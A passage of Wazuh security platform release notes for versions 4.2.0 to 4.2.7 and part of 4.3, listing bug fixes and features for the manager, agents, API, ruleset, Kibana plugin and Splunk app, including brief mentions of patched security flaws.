
#11161

An uninitialized Blowfish encryption structure warning is fixed.

#11262

A memory overrun hazard in Vulnerability Detector is fixed.

#11282

A bug when using a limit parameter higher than the total number of objects in the wazuh-db queries is fixed.

#11440

A false positive for MySQL in Vulnerability Detector is prevented.

#11448

The segmentation fault when the wrong configuration is set is fixed.

#11440

A false positive in Vulnerability Detector is fixed when scanning OVAl for Ubuntu Xenial and Bionic.

#11835

An argument injection hazard is fixed in the Pagerduty integration script. Thank you Jose Maria Zaragoza (@JoseMariaZ) for reporting this issue.

#11863

Memory leaks in the feed parser at Vulnerability Detector are fixed. Architecture data member from the RHEL 5 feed. RHSA items containing no CVEs. Unused RHSA data member when parsing Debian feeds.

#12368

Now, Authd ignores the pipe signal if Wazuh DB gets closed.

#12415

A buffer handling bug is fixed in Remoted that left the syslog TCP server stuck.

#12644

A memory leak in Vulnerability Detector is fixed when discarding kernel packages.

#12655

A memory leak at wazuh-logtest-legacy is fixed when matching a level-0 rule.

#12489

Now, the cluster is disabled by default when the "disabled" tag is not included.

#13067

A bug in the Vulnerability Detector CPE helper that may lead to producing false positives about Firefox ESR is fixed.

Agent

Reference

Description

#8784

A bug in FIM that did not allow monitoring new directories in real-time mode if the limit was reached at some point is fixed.

#8941

A bug in FIM that threw an error when a query to the internal database returned no data is fixed.

#8362

An error where the IP address was being returned along with the port for Amazon NLB service is fixed.

#8372

AWS module is fixed to properly handle the exception raised when processing a folder without logs.

#8433

A bug with the AWS module when pagination is needed in the bucket is fixed.

#8672

An error with the ipGeoLocation field in AWS Macie logs id fixed.

#10333

An incorrect debug message in the GCloud integration module is changed.

#7848

Data race conditions are fixed in FIM.

#10011

A wrong command line display in the Syscollector process report on Windows is fixed.

#10249

An issue that causes shutdown when agentd or analysisd is stopped is fixed.

#10405

Wrong keepalive message from the agent when file merged.mg is missing is fixed.

#10381

Missing logs from the Windows agent when it's getting stopped are fixed.

#10524

Missing packages reporting in Syscollector for macOS due to empty architecture data is fixed.

#7506

FIM on Linux to parse audit rules with multiple keys for who-data is fixed.

#10639

Windows 11 version collection in the agent is fixed.

#10602

Missing Eventchannel location in Logcollector configuration reporting is fixed.

#10794

CloudWatch Logs integration is updated to avoid crashing when AWS raises Throttling errors.

#10718

AWS modules' log file filtering is fixed when there are logs with and without a prefix mixed in a bucket.

#10884

A bug on the installation script that made upgrades not to update the code of the external integration modules id fixed.

#10921

An issue with the AWS integration module trying to parse manually created folders as if they were files is fixed.

#11086

Some installation errors in OS with no subversion are fixed.

#11115

A typo in an error log about enrollment SSL certificate is fixed.

#11121

A unit tests for Windows agent when built on MinGW 10 is fixed.

#10942

Windows agent compilation warnings are fixed.

#11207

The OS version reported by the agent on OpenSUSE Tumbleweed is fixed.

#11329

The Syscollector is prevented from truncating the open port inode numbers on Linux.

#11365

An agent auto-restart on configuration changes, when started via wazuh-control on a Systemd based Linux OS is fixed.

#10952

A bug in the AWS module resulting in unnecessary API calls when trying to obtain the different Account IDs for the bucket is fixed.

#11278

Azure integration's configuration parsing to allow omitting optional parameters is fixed.

#11296

Azure Storage credentials validation bug is fixed.

#11455

The read of the hostname in the installation process for openSUSE is fixed.

#11425

The graceful shutdown when the agent loses connection is fixed.

#11736

The error "Unable to set server IP address" is fixed on the Windows agent.

#11608

The reparse option is fixed in the AWS VPCFlow and Config integrations.

#12324

The way the AWS Config integration parses the dates used to search in the database for previous records was fixed.

#12676

Now, Logcollector audit format parses logs with a custom name_format.

#12704

An issue with the Agent bootstrap is fixed, it might lead to a startup timeout when it cannot resolve a manager hostname.

#13088

A bug in the agent's leaky bucket throughput regulator that could leave it stuck if the time is advanced on Windows is fixed.

RESTful API

Reference

Description

#8196

An inconsistency in RBAC resources for group:create, decoders:update, and rules:update actions are fixed.

#8378

The handling of an API error message occurring when Wazuh is started with a wrong ossec.conf is fixed. Now, the execution continues and raises a warning.

#8548

A bug with the sort parameter that caused a wrong response when sorting by several fields is fixed.

#8597

The description of force_time parameter in the API spec reference is fixed.

#8537

API incorrect path in remediation message when a maximum number of requests per minute is reached is fixed.

#9071

Agents' healthcheck error in the API integration test environment is fixed.

#9077

A bug with wazuh-apid process handling of PID files when running in foreground mode is fixed.

#9192

A bug with RBAC group_id matching is fixed.

#9147

Temporal development keys and values from GET /cluster/healthcheck response are removed.

#9227

Several errors when filtering by dates are fixed.

#9262

The limit in some endpoints like PUT /agents/group/{group_id}/restart and added a pagination method is fixed.

#9320

A bug with the search parameter resulting in invalid results is fixed.

#9368

Wrong values of external_id field in MITRE resources are fixed.

#9399

The way how the API integration testing environment checks that wazuh-apid daemon is running before starting the tests is fixed.

#9777

A healthcheck is added to verify that logcollector stats are ready before starting the API integration test.

#10159

The API integration test healthcheck used in the vulnerability test cases is fixed.

#10179

An error with PUT /agents/node/{node_id}/restart endpoint when no agents are present in selected node is fixed.

#10322

An RBAC experimental API integration test expecting a 1760 code in implicit requests is fixed.

#10289

A cluster race condition that caused the API integration test to randomly fail is fixed.

#10619

The PUT /agents/node/{node_id}/restart endpoint to exclude exception codes properly is fixed.

#10666

The PUT /agents/group/{group_id}/restart endpoint to exclude exception codes properly is fixed.

#10656

The agent endpoints q parameter to allow more operators when filtering by groups is fixed.

#10830

The API integration tests related to rule, decoder, and task endpoints are fixed.

#11411

Exceptions handling when starting the Wazuh API service is improved.

#11598

The race condition while creating RBAC database is fixed.

#12102

The API integration tests failures caused by race conditions are fixed.

Ruleset

Reference

Description

#11117

Bad characters are fixed on rules 60908 and 60884 - win-application rules.

#11369

Microsoft logs rules are fixed.

#11405

PHP rules for MITRE and groups are fixed.

#11214

Rules id for Microsoft Windows PowerShell is fixed.

Wazuh Kibana plugin

Reference

Description

#3384

The creation of log files is fixed.

#3484

The double fetching alerts count when pinning/unpinning the agent in MITRE ATT&CK/Framework is fixed.

#3490

A refactor of the query Config is changed from Angular to React.

#3412

The flyout closing when dragging and releasing mouse event outside the Rule-test and Decoder-test flyout is fixed.

#3430

Now Wazuh notifies you when you are registering an agent without permission.

#3438

Not used redirectRule query param when clicking the row table on CDB Lists/Decoders is removed.

#3439

The code overflows over the line numbers in the API Console editor is fixed.

#3440

The issue that avoids opening the main menu when changing the selected API or index pattern is fixed.

#3443

An error message in conf management is fixed.

#3445

An issue related to the size API selector when the name is too long is fixed.

#3456

An error when editing a rule or decoder is fixed.

#3458

An issue about the index pattern selector doesn't display the ignored index patterns is fixed.

#3553

An error in /Management/Configuration when the cluster is disabled is fixed.

#3565

An issue related to pinned filters removed when accessing the Panel tab of a module is fixed.

#3645

Multi-select component searcher handler is fixed.

#3609

The order logs properly in Management/Logs are fixed.

#3661

The Wazuh API requests to GET // are fixed.

#3675

Missing MITRE tactics are fixed.

#3488

The CDB list views not working with IPv6 is fixed.

#3466

The bad requests using the Console tool to PUT /active-response API endpoint are fixed.

#3605

An issue related to the group agent management table does not update on error is fixed.

#3651

An issue about not showing packages details in agent inventory for a FreeBSD agent SO is fixed.

#3652

Wazuh token deleted twice is fixed.

#3687

The handler of an error on dev-tools is fixed.

#3685

The compatibility with wazuh 4.3 - kibana 7.13.4 is fixed.

#3689

The registry values without agent pinned in FIM>Events are fixed.

#3688

The breadcrumbs style compatibility for Kibana 7.14.2 is fixed.

#3682

The security alerts table when filters change is fixed.

#3692

An error that shows we're using X-Pack when we have Basic is fixed.

#3700

The blank screen in Kibana 7.10.2 is fixed.

#3704

Related decoders file link errors when users click on it are fixed.

#3708

Flyouts in Kibana 7.14.2 are fixed.

#3707

The bug of index patterns in health-check due to a bad copy of a PR is fixed.

#3733

Styles and behavior of button filter in the flyout of Inventory section for Integrity monitoring and Vulnerabilities modules are fixed.

#3733

The height of the Evolution card in the Agents section when has no data for the selected time range is fixed.

#3722

The clearing of the query filter that doesn't update the data in Office 365 and GitHub Panel tab is updated.

#3710

Wrong daemons in the filter list are fixed.

#3724

A bug when creating a filename with spaces that throws a bad error is fixed.

#3731

A bug in security User flyout nonexistent unsubmitted changes warning is fixed.

#3732

The redirect to a new tab when clicking on a link is fixed.

#3737

Missing settings in Management/Configuration/Global configuration/Global/Main settings is fixed.

#3738

The Maximum call stack size exceeded error exporting key-value pairs of a CDB List is fixed.

#3741

The regex lookahead and lookbehind for safari are fixed.

#3744

Vulnerabilities Inventory flyout details filters are fixed.

#3604

Removed API selector toggle from Settings menu since it performed no useful function.

#3748

Dashboard PDF report error when switching pinned agent state is fixed.

#3753

The rendering of the command to deploy a new Windows agent not working in some Kibana versions now works correctly.

#3772

Action buttons no longer overlay with the request text in Tools/API Console.

#3774

A bug in Rule ID value in reporting tables related to top results is now fixed.

#3787

An issue with github/office365 multi-select filters suggested values is now fixed.

#3790

We fixed an issue related to updating the aggregation data of the Panel section when changing the time filter

#3804

We removed the button to remove an agent for a group in the agents' table when it is the default group.

#3776

Adding a single agent to a group is fixed.

#3777

The implicit filters from the search bar can be removable.

#3778

Office365/Github module the side panel tab are fixed.

#3780

No wrap text in MITRE ATT&CK intelligence table is fixed.

#3781

The visualization tooltip position is fixed.

#3787

github/office365 multi-select filters suggested values is fixed.

#3796

The styles on the evolution card are fixed.

#3831

Internal user no longer needs permission to make x-pack detection request.

#3845

Agents details card style is fixed.

#3854

Agents evolutions card is fixed.

#3866

Routing redirection in events documents discovers links are fixed.

#3868

Health-check is fixed.

#3901

The table of Vulnerabilities/Inventory doesn't reload when changing the selected agent is fixed.

#3901

The issue with the table in Modules/Vulnerabilities/Inventory that doesn't refresh when changing the selected agent is fixed.

#3937

An asynchronism issue when multiple fields are missing in the Events view rows details is solved.

#3942

A rendering problem in the map visualizations is fixed.

#3877

Parse error when using # character not at the beginning of the line.

#3944

The rule.mitre.id cell enhancement that doesn't support values with sub techniques is solved.

#3947

An error when changing the selected time in some flyouts is fixed.

#3957

An issue related to the user can log out when the Kibana server has a basepath configurated is solved.

#3991

A fatal cron-job error when Wazuh API is down is fixed.

Wazuh Splunk app

Reference

Description

#1137

Long agent names no longer overflow in the overview page.

#1138

An issue that occurred when saving rules or decoders files is now fixed.

#1141

An issue with unnecessary table requests when resizing the browser window is fixed.

#1215

Agent counters are now centered correctly.

#1216

Users can no longer add new agents without the right "create" permissions.

#1217

The navigation bar for Security options no longer overlaps with the background header.

#1223

An error when the agents view is re-initialized is now fixed.

#1230

This issue is fixed and you can now see actions after adding the first API.

#1232

The Agent status chart data is shown correctly.

#1237

The Agent status graph is fixed to show the correct amount of agents.

#1258

The sorting on the Groups table columns is fixed.

#1260

Non-sortable columns are fixed on the Security section tables.

#1271

Group report disabled configuration parameter error is fixed.

#1266

Import CDB list file is fixed.

#1282

Header menu height style issue is fixed.

#1283

An error is fixed on the search string used on the Alerts Summary table in the Overview > Vulnerability section, causing the table to show no data.

Others

Reference

Description

#9168

Error detection in the CURL helper library is fixed.

#10899

External Berkeley DB library support for GCC 11 is fixed.

#11086

An installation error due to missing OS minor version on CentOS Stream is fixed.

#11455

An installation error due to a missing command hostname on OpenSUSE Tumbleweed is fixed.

Changelogs

More details about these changes are provided in the changelog of each component:

4.2.7 Release notes - 30 May 2022

This section lists the changes in version 4.2.7. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements.

Wazuh Kibana plugin
  • Wazuh Kibana plugin is now compatible with Wazuh 4.2.7.

Wazuh Splunk app
  • Wazuh Splunk app is now compatible with Wazuh 4.2.7.

Resolved issues

This release resolves known issues.

Manager

Reference

Description

#13617

A crash in Vulnerability Detector when scanning agents running on Windows is now fixed (backport from 4.3.2).

Changelogs

More details about these changes are provided in the changelog of each component:

4.2.6 Release notes - 28 March 2022

This section lists the changes in version 4.2.6. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements.

Wazuh Kibana plugin
  • Wazuh Kibana plugin is now compatible with Wazuh 4.2.6.

Wazuh Splunk app
  • Wazuh Splunk app is now compatible with Wazuh 4.2.6.

Resolved issues

This release resolves known issues.

Manager

Reference

Description

#11974

This release resolves an integer overflow hazard in wazuh-remoted that caused it to drop incoming data after receiving 2^31 messages.

Changelogs

More details about these changes are provided in the changelog of each component:

4.2.5 Release notes - 15 November 2021

This section lists the changes in version 4.2.5. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements.

Manager
  • #10809 Active response requests for agents between versions 4.2.0 and 4.2.4 are now sanitized to prevent unauthorized code execution.

Wazuh Kibana plugin
  • Wazuh Kibana plugin is now compatible with Wazuh 4.2.5.

  • Support for Kibana 7.13.4.

  • Support for Kibana 7.14.2.

Wazuh Splunk app
  • Wazuh Splunk app is now compatible with Wazuh 4.2.5.

Resolved issues

This release resolves known issues.

Agent

Reference

Description

#10809

A bug in the Active Response tools that might allow unauthorized code execution has been mitigated.

Wazuh Kibana plugin

Reference

Description

#3653

A compatibility issue between Wazuh 4.2 and the kibana 7.13.4 is now fixed. In addition, this fix is compatible with Kibana 7.10.

#3654

This fix resolves an error that produced the interactive screen of a new agent to break when selecting the Windows OS option. This fix is compatible with Kibana 7.10.

#3668

A style compatibility issue of the breadcrumb navigation inside Kibana 7.14.2 is now fixed.

#3670

This fix resolves the Wazuh API token not being deprecated after logout with Kibana 7.13 and 7.14.

#3672

A Group Configuration and Management Configuration error is now fixed when the user tries to go back after saving.

#3674

With this fix, the panels and their titles are correctly displayed in the Welcome Overview and the Management Directory. In addition, it resolves that all the Wazuh menus are consistent without titles in gray.

#3676

An issue with double flyout appearing when clicking a policy is now fixed.

#3678

Kibana settings conflict in health check is now fixed.

#3681

Compatibility to get the valid index patterns and refresh fields for Kibana 7.10.2-7.13.4 is now fixed.

Changelogs

More details about these changes are provided in the changelog of each component:

4.2.4 Release notes - 20 October 2021

This section lists the changes in version 4.2.4. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements.

Wazuh Kibana plugin
  • Wazuh Kibana plugin is now compatible with Wazuh 4.2.4.

Wazuh Splunk app
  • Wazuh Splunk app is now compatible with Wazuh 4.2.4.

Resolved issues

This release resolves known issues.

Manager

Reference

Description

#9158

This fix prevents files belonging to deleted agents from remaining in the manager.

#10432

Fixed inaccurate agent group file cleanup in the database sync module. Now, the module syncs up the agent database from client.keys before cleaning up the groups folder.

#10479

This fix prevents the manager from corrupting the agent data integrity when the disk gets full.

#10559

A resource leak in Vulnerability Detector when scanning Windows agents is now fixed.

Wazuh Kibana plugin

Reference

Description

#3638

An issue that caused the user's auth token not to be deprecated correctly after logging out of the API is now fixed.

Changelogs

More details about these changes are provided in the changelog of each component:

4.2.3 Release notes - 6 October 2021

This section lists the changes in version 4.2.3. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

What's new

This release includes new features or enhancements.

Wazuh Kibana plugin
  • Wazuh Kibana plugin is now compatible with Wazuh 4.2.3.

Wazuh Splunk app
  • Wazuh Splunk app is now compatible with Wazuh 4.2.3.

Resolved issues

This release resolves known issues.

Manager

Reference

Description

#10388

An issue in Remoted that might lead it to crash when retrieving an agent's group is now fixed.

Changelogs

More details about these changes are provided in the changelog of each component:

4.2.2 Release notes - 28 September 2021

This section lists the changes in version 4.2.2. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

This release includes highlighted features and enhancements.

Manager
  • #9779 Authd now refuses enrollment attempts if the agent already holds a valid key. With this added feature, Authd can only generate new keys if the agent key does not exist on the manager side. Based on this, the manager has the capability to decide if a new key should be generated or not. Since the introduction of Enrollment in version 4.0.0, Wazuh provides the user with an automated mechanism to enroll agents with minimal configuration. This registration method might cause agents to self-register under certain circumstances, even if they were already registered. This improvement prevents this issue from happening and avoids re-registering agents that already have valid keys.

Agent
  • #9927 The Google Cloud Pub/Sub integration module is updated to increase processed events per second. The rework of this integration module allows multithreading, increases performance significantly, and adds a new num_threads option to the module configuration. The new multithreading feature allows pulling messages with multiple subscribers simultaneously, improving the performance drastically. In addition, this new Google Cloud integration includes some improvements in the pulling and acknowledging mechanism, and the socket connection as well.

Wazuh Kibana plugin
  • #3175 Wazuh improves the API selector and Index pattern selector of the Wazuh Kibana plugin, moving both from the main menu to the upper right corner of the header bar for quick access. This new UX improvement allows users to have better management of these two features. As for visualization, the API selector is displayed when there is more than one to select. The Index pattern selector is displayed under the same conditions and only contains index patterns that have Wazuh alerts.

  • #3503 Wazuh adds a new functionality that allows users to change the logotype settings of the Wazuh Kibana plugin. From the Logo Customization section of the Configuration page, users can customize the logos of the app easily and to their liking. Setting options include customization of Logo App, Logo Sidebar, Logo Health Check, and Logo Reports.

Logo customization settings
Wazuh Splunk app
  • #1107 Wazuh adds Quick Settings to improve the view and selection of the Wazuh API, Index, and Source type of the Wazuh Splunk app. Now users can change the configuration of these elements easily from this new menu in the app.

Quick settings menu
What's new

This release includes new features or enhancements.

Manager
  • #9133 The agent's inventory data on the manager is correctly cleaned up when Syscollector is disabled.

  • #9779 Authd now correctly refuses enrollment attempts if the agent already holds a valid key.

Agent
  • #9907 Syscollector scan performance is optimized.

  • #9927 The Google Cloud Pub/Sub integration module rework increases the number of processed events per second allowing multithreading and enhancing performance. Also, a new num_threads option is added to the module configuration.

  • #9964 google-cloud-pubsub dependency is now upgraded to the latest stable version (2.7.1).

  • #9443 The WPK installer rollback is reimplemented on Linux.

  • #10217 Updated AWS WAF implementation to change httpRequest.headers field format.

RESTful API
  • #10219 Made SSL ciphers configurable and renamed SSL protocol option.

Wazuh Kibana plugin
  • #3170 Wazuh support links are added to the Kibana help menu. You now get quick access to the Wazuh Documentation, Slack channel, Projects on GitHub, and Google Group.

  • #3184 You now can access group details directly by using the group query parameter in the URL.

  • #3222 #3292 A new configuration is added to disable Wazuh App access from X-Pack/ODFE role.

  • #3221 New confirmation message is now displayed when closing a form.

  • #3503 Wazuh introduces a new Logo Customization section that allows you to change and customize app logotypes.

  • #3592 The link to the Wazuh Upgrade guide is now included in the message shown when the Wazuh API version and the Wazuh App version mismatch.

  • #3160 To improve user experience, module titles are now removed from the dashboards.

  • #3174 The default wazuh.monitoring.creation app setting is changed from d to w.

  • #3174 The default wazuh.monitoring.shards app setting is changed from 2 to 1.

  • #3189 SHA1 field is removed from the Windows Registry details pane.

  • #3250 Removed tooltip from header breadcrumb to improve readability.

  • #3197 Refactoring of the Health check component improves user experience.

  • #3210 When deploying a new agent, the Install and enroll the agent command now specifies the version in the package downloaded name.

  • #3243 In the vulnerabilities Inventory, the restriction that only allowed current active agents’ information to be shown is removed. Now, it displays the vulnerabilities table regardless of whether the agent is connected or not.

  • #3175 To improve user experience of the Wazuh Kibana API, the Index pattern selector and API selector are moved to the header bar.

  • #3258 Health check actions' notifications are refactored and the process can now be run in debug mode.

  • #3349 Changed the way kibana-vis hides the visualization while loading. This improvement prevents errors caused by having a 0 height visualization.

Wazuh Splunk app
  • #1083 Added MITRE ATT&CK framework integration.

  • #1076 Added MITRE ATT&CK dashboard integration.

  • #1109 Wazuh now gives you enhanced insight into the CVE that are affecting an agent. The newly added Inventory dashboard in the Vulnerabilities module allows you to visualize information such as name, version, and package architecture, as well as the CVE ID that affects the package.

  • #1104 New Source type selector is now added to customize queries used by dashboards.

  • #1107 The Wazuh Splunk app now includes a Quick settings menu to improve user experience. This enhancement allows you to quickly view and select the Wazuh API, Index, and Source type.

  • #1118 jQuery version is upgraded from 2.1.0 to 3.5.0.

  • Wazuh supports Splunk 8.1.4.

  • Wazuh supports Splunk 8.2.2.

Resolved issues

This release resolves known issues.

Manager

Reference

Description

#9647

A false positive in Vulnerability Detector is no longer generated when packages have multiple conditions in the OVAL feed.

#9042

This fix prevents pending agents from keeping their state indefinitely in the manager.

#9088

An issue in Remoted is fixed. Now, it checks the group an agent belongs to when it receives the keep-alive message and avoids agents in connected state with no group assignation.

#9278

An issue in Analysisd that caused the value of the rule option noalert to be ignored is now fixed.

#9378

Fixed Authd's startup to set up the PID file before loading keys.

#9295

An issue in Authd that delayed the agent timestamp update when removing agents is now fixed.

#9705

An error in Wazuh DB that held wrong agent timestamp data is now resolved.

#9942

An issue in Remoted that kept deleted shared files in the multi-groups' merged.mg file is now fixed.

#9987

An issue in Analysisd that overwrote its queue socket when launched in test mode is now resolved.

#10016

This fix prevents false positives when evaluating DU patches in the Windows Vulnerability Detector.

#10214

Memory leak is fixed when generating the Windows report in Vulnerability Detector.

#10194

A file descriptor leak is fixed in Analysisd when delivering an AR request to an agent.

Agent

Reference

Description

#9710

This fix prevents the manager from hashing the shared configuration too often.

#9310

Memory leak is fixed in Logcollector when re-subscribing to Windows EventChannel.

#9967

Memory leak is fixed in the agent when enrolling for the first time with no previous key.

#9934

CloudWatchLogs log stream limit, when there are more than 50 log streams, is now removed.

#9897

Fixed a problem on the Windows installer and now, with this fix, the agent can be successfully uninstalled or upgraded.

#9775

AWS WAF log parsing error is fixed and log parsing now works correctly when there are multiple dictionaries in one line.

#10024

An issue is fixed in the AWS CloudWatch Logs module that caused already processed logs to be collected and reprocessed.

#8256

This fix avoids duplicate alerts from case-insensitive 32-bit registry values in FIM configuration for Windows agents.

#10250

Error with Wazuh path in Azure module is now fixed.

#10210

An issue is fixed in the sources and WPK installer that made the upgrade unable to detect the previous installation on CentOS 7.

RESTful API

Reference

Description

#9984

An issue with distributed API calls when the cluster is disabled is now fixed.

Wazuh Kibana plugin

Reference

Description

#3159

Cluster visualization screen flickering is fixed.

#3161

Links now work correctly when using server.basePath Kibana setting.

#3173

In the Vulnerabilities module, a filter error is resolved and PDF reports are generated with complete Summary information.

#3234

Fixed typo error in the Configuration tab of the Settings page.

#3217

In the agent summary of the Agents data overview page, fields no longer overlap under certain circumstances and are correctly displayed.

#3257

An issue when using the Ruleset Test is now fixed. Now, all requests are made in the session unless you click Clear session.

#3237

Visualize button issue is resolved and the button is displayed when expanding a field in the Events tab sidebar.

#3244

Some modules were missing from the Agents data overview page. This issue is fixed and they are now successfully displayed.

#3260

With this fix, App log messages are improved and WUI error logs removed.

#3272

Some errors on PDF reports are fixed.

#3289

When deploying a new agent, selecting macOS as the operating system in a Safari browser no longer generates a TypeError.

#3297

An issue in the Security configuration assessment module is fixed. SCA checks are displayed correctly.

#3241

An issue with an error message when adding sample data fails is fixed.

#3303

An error in reports is fixed and now the Alerts Summary of modules is generated completely.

#3315

Fixed dark mode visualization background in PDF reports.

#3309

Kibana integrations are now adapted to Kibana 7.11 and 7.12.

#3306

An issue is fixed in the Agents overview window and is now rendered correctly.

#3326

Fixed an issue with miscalculation of table width in PDF reports. With this fix, tables are displayed correctly.

#3323

visData table property is normalized for 7.12 backward compatibility and Alerts Summary table is shown in PDF reports.

#3358

Export-to-CSV buttons in dashboard tables are now fixed.

#3345

Fixed Elastic UI breaking changes errors in 7.12.

#3347

Wazuh main menu and breadcrumb render issues are now fixed.

#3397

This fix prevents some errors from causing a massive increase in logs size.

#3593

Fixed an issue in the Vulnerabilities pane that did not show alerts if the vulnerability had a field missing.

#3240

This fix correctly hides the navbar Wazuh label.

#3355

Labels of some visualizations no longer overlap, improving readability.

Wazuh Splunk app

Reference

Description

#1070

Error when trying to pin filters is fixed.

#1074

Issue in tables without server side pagination is fixed. This allows to load unlimited items but only 1 page at a time preserving client and server resources.

#1077

An issue with the gear icon mispositioned in FIM tables is now fixed.

#1078

Added cache control. With this fix, a message is displayed if the version of the Wazuh app in your browser does not correspond with the app version installed on Splunk.

#1084

Fixed error where tables unset their loading state before finishing API calls.

#1083

An issue about search bar queries with spaces is fixed.

#1083

Fixed pinned fields ending with curly brackets.

#1099

Splunk Cloud compatibility issues are now fixed.

#1103

Agents node names are now correctly displayed for agent overview.

#1103

Reports no longer have missing columns for some tables and are now displayed correctly.

#1112

Issue with expanding row feature in File Integrity Monitoring of agents is now fixed.

Changelogs

More details about these changes are provided in the changelog of each component:

4.2.1 Release notes - 3 September 2021

This section lists the changes in version 4.2.1. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Wazuh core
Resolved issues

Installer

Reference

Description

#9973

An issue in the upgrade to 4.2.0 that disabled Eventchannel support on Windows agents is now fixed.

Modules

Reference

Description

#9975

An issue with Python-based integration modules causing the integrations to stop working in Wazuh v4.2.0 agents is now fixed.

Wazuh Kibana plugin
What's new
  • Wazuh Kibana plugin is now compatible with Wazuh 4.2.1.

Wazuh Splunk app
What's new
  • Wazuh Splunk app is now compatible with Wazuh 4.2.1.

Changelogs

More details about these changes are provided in the changelog of each component:

4.2.0 Release notes - 25 August 2021

This section lists the changes in version 4.2.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights

Core

  • #3368, #5652, #7109 Logcollector improvements:

    Logcollector is now enhanced with several new features. Wazuh adds Logcollector support for bookmarks, which allows you to continue reading a log file from the last read line where the agent stopped, improving efficiency and productivity. The multi-line log support through regex lets you collect multi-line logs with a variable number of lines. The agent also generates a statistics file report during Logcollector lifetime. This means that, in addition to the alternative of accessing metrics via API queries, you now have the option to access this information from a file stored in an agent, according to a configurable time.

  • #7731 Visibility improvements on agent CVE inventory report:

    Wazuh now generates CVE inventory reports that give you insight into vulnerabilities that affect an agent. With this added feature, this information is now queried through the RESTful API and displayed on the user interface for analysis. This visibility improvement allows you to assess vulnerabilities affecting your monitored agents and take quick corrective action if needed.

  • #7541 Agent port support for TCP and UDP:

    Remoted now supports listening to TCP and UDP ports simultaneously. This new support of both protocols provides several enhanced features related to manager active check, agent connection and logging, active response, API requests, JSON formatting, and more. This new supportability also provides enhancements related to centralized configuration since now agents can be configured remotely by using the agent.conf file.

  • #6912 Wazuh unified standard improvements:

    The names of daemons and tools for the Wazuh product are now renamed and unified to achieve consistency and uniformity, according to the new Wazuh standards.

  • #7105, #7018, #7268, #8224, #7795 Stability enhancements on Wazuh features:

    Wazuh new fixes provide stability to several features of the solution, including Analysisd, File Integrity Monitoring, Remoted, and Vulnerability Detector. These changes improve user experience throughout the product.

API

  • #7588 Endpoint for allow_run_as parameter configuration:

    The allow_run_as parameter is now removed from endpoints to create and update API users. Now, Wazuh adds a new endpoint to modify the user’s allow_run_as flag, allowing you to enable or disable the parameter after creating a user.

  • #7647 CVE data endpoint integration:

    Wazuh adds a new endpoint to get CVE data on affected agents. With this new endpoint, you can query the vulnerability data of any agent and get enhanced insight into the CVE, giving you easy access to data such as package name, package version, package architecture, and the CVE ID that affects said package.

  • #7200 Endpoint for Logcollector statistics:

    Wazuh adds a new endpoint to get statistics from different components such as Logcollector, allowing you to retrieve information from both managers and agents. With this enhancement, Wazuh components that generate statistics files bring this information using their own socket interface and fetch the data from a remote component.

  • #6366 Improved DELETE /agents endpoint:

    The DELETE/agents query now integrates new parameters that allow you to customize selection, and to easily remove agents that belong to a group. With this improvement, the older_than field is also removed from the response.

Wazuh Kibana plugin

  • #1434 New Ruleset Test tool:

    Wazuh improves the user experience by adding a new Ruleset Test feature under the Tools section of the Wazuh Kibana plugin menu. This feature is also included as a tool in the action bar of both the Edit Rules and Edit Decoders sections, allowing you to keep the Ruleset Test window open while you navigate through the page to edit or create a ruleset file.

    The new Ruleset Test tool also integrates an input box for reading sample logs and an output box that allows you to visualize the test results. With this enhancement, you can now test sample logs directly on the Wazuh user interface and see how the ruleset reacts to specific log messages.

  • #1434 Tools menu improvements:

    The Dev Tools feature is renamed as API Console and it is now found, together with the new Ruleset Test feature, inside the new Tools section under the Wazuh Kibana plugin menu.

  • #3056 New Agent Stats section:

    Wazuh adds a new Stats section that improves the visibility you have over agents’ statistics. You can access this feature by clicking Stats in the action ribbon on the Agent data overview page. This improvement allows you to visualize information fetched by the new API endpoint /agents/{agent_id}/stats/logcollector in the Wazuh user interface.

  • #3069 Agent new vulnerability inventory:

    Wazuh now gives you enhanced insight into the CVE that are affecting an agent. The newly added Inventory tab in the Vulnerabilities module allows you to visualize information such as package name, package version, package architecture, and the CVE ID that affects the package, and more. You can also access the vulnerability data flyout to expand on the specifics of each vulnerability entry detailed in the Inventory.

Breaking changes
  • #7317 With its Active Response capability, Wazuh now sends information to the active response executables via stdin instead of in-line arguments. Any custom active response script developed for previous versions of Wazuh needs to be adapted to accept the event information. Previous default scripts present in the active-response/bin directories are now replaced as part of the agent upgrade process. The Wazuh manager continues to send in-line arguments to Wazuh agents up to version 4.1.5. This improvement also includes new rules to match the new active response logs.

Wazuh core
What's new

This release includes new features or enhancements.

Cluster

  • #8175 Improvements in cluster node integrity calculation make the process more efficient. Now, it calculates the MD5 of only the files that were modified since the last integrity check.

  • #8182 The synchronization workflow of agent information between cluster nodes is optimized and now the synchronization is performed in a single task for each worker.

  • #8002 Cluster logs are now changed to show more useful and essential information, improving clarity and readability.

Core

  • #3368 Wazuh adds support for bookmarks in Logcollector. This allows you to follow the log file from the last read line where the agent stopped.

  • #5652 Wazuh collects multi-line logs with a variable number of lines in Logcollector. This improved support is especially useful when dealing with logs, such as Java Stack Trace, since the number of lines in the log no longer needs to be held constant for every event type.

  • #6830 A new option is added that lets you limit the maximum number of files read per second for File Integrity Monitoring (FIM) scan. You now have more FIM control by allowing you to set the limit of the amount of data analyzed during a scheduled scan.

  • #7109 Wazuh adds statistics file to Logcollector. In addition to the alternative of accessing metrics via API queries, you now have the option to access this information from a file stored in an agent, according to a configurable time. This data is generated and updated every logcollector.state_interval seconds and can be accessed at any moment.

  • #7239 Wazuh provides enhanced state information by adding statistical data queries to the agent.

  • #7307 Quoting in commands to group arguments in the command wodle and SCA checks are allowed. Before this enhancement, the system parsed quoted substrings into the same argument but double-quotes were kept. Now, scapes and double-quotes are allowed in command lines so that you can handle arguments in command calls.

  • #7408 Agent IP address detection capabilities are improved and agents running on Solaris now send their IP address to the manager.

  • #7444 A new ip_update_interval option is added to set how often the agent refreshes its IP address.

  • #7661 New support is added for testing location information in Wazuh logtest.

